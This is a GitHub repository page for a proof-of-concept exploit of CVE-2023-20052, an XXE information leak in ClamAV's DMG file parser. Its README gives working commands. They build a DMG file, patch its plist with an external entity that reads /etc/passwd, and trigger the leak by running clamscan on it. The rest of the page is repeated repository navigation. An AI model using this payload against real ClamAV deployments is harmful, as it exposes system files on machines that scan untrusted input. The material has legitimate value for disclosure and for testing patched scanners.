CVE-2023-20052

CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Usage
To create malicious DMG file

git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg

To trigger exploit
clamscan --debug exploit.dmg

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
1.png		1.png
2.png		2.png
Dockerfile		Dockerfile
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

1.png

1.png

2.png

2.png

Dockerfile

Dockerfile

README.md

README.md

Repository files navigation

CVE-2023-20052

About

Releases

Packages

Languages

nokn0wthing/CVE-2023-20052

Folders and files

Latest commit

History

Repository files navigation

CVE-2023-20052

About

Resources

Stars

Watchers

Forks

Languages